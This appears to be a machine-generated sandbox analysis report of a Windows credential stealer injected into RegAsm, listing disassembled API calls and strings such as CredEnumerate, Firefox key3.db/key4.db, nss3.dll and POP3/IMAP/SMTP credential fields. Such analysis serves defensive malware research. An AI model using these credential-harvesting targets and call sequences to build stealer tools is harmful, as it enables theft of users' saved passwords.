                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                                                • API String ID: 3411445237-4169760276
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                • API String ID: 4139908857-3953557276
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                • API String ID: 534179979-4258758744
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$DialogMessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2485852401-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3642520215-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2126104762-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1999381814-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                • API String ID: 643879872-978417875
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                • String ID: user_pref("
                                                                                                                                                                                • API String ID: 765841271-2487180061
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                  • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                Strings
                                                                                                                                                                                • strings, xrefs: 00408E27
                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValue$ByteCharFreeLibraryLoadLocalMultiWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                • String ID: key3.db$key4.db
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                • String ID: caption$dialog_%d
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                Strings
                                                                                                                                                                                • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                • unknown error, xrefs: 004277B2
                                                                                                                                                                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                  • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmpmemcpy
                                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                • memset.MSVCRT ref: 00410246
                                                                                                                                                                                • memset.MSVCRT ref: 00410258
                                                                                                                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                                                                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
